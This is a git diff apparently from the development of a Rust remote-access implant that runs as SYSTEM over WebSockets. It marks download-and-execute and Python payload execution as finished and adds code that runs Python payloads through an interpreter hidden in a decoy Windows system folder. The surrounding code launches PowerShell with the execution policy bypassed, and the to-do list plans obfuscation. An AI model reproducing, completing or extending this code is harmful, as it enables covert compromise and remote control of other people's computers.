diff --git a/README.md b/README.md
index d62d8b8..2568c51 100644
--- a/README.md
+++ b/README.md
@@ -9,6 +9,11 @@ It is intended to run as NT AUTHORITY/SYSTEM, even if it uses WebSockets, becaus
 - [X] reliable websockets
 - [X] run\_as\_user
 - [X] basic commands
-- [ ] download and execute
-- [ ] dnx python
+- [X] download and execute
+- [X] dnx python
 - [ ] windows service
+- [ ] criticality
+- [ ] screenshot functionality
+- [ ] test payloads with arguments
+- [ ] get more ideas from The Group(TM) i guess
+- [ ] hardening/obfuscating???
diff --git a/embedded_py.7z b/embedded_py.7z
new file mode 100644
index 0000000..6e82feb
Binary files /dev/null and b/embedded_py.7z differ
diff --git a/src/lib.rs b/src/lib.rs
index 2ac9b25..56c258b 100644
--- a/src/lib.rs
+++ b/src/lib.rs
@@ -100,7 +100,10 @@ pub async fn eval_command(text: impl Into<&str>) -> anyhow::Result<String> {
           _exec_args = vec!["-ExecutionPolicy".to_string(), "Bypass".to_string(), "-File".to_string(), file_path.clone()];
           _exec_args.extend(params.args.iter().cloned());
         }
-        PayloadType::Python => todo!("py payload handling"),
+        PayloadType::Python => {
+          _exec_command = "C:\\Windows\\System32\\ExperienceOrientedReporter\\serialiser\\python.exe".to_string();
+          _exec_args = vec![file_path];
+        }
       }
 
       // 3. Handle user vs system execution.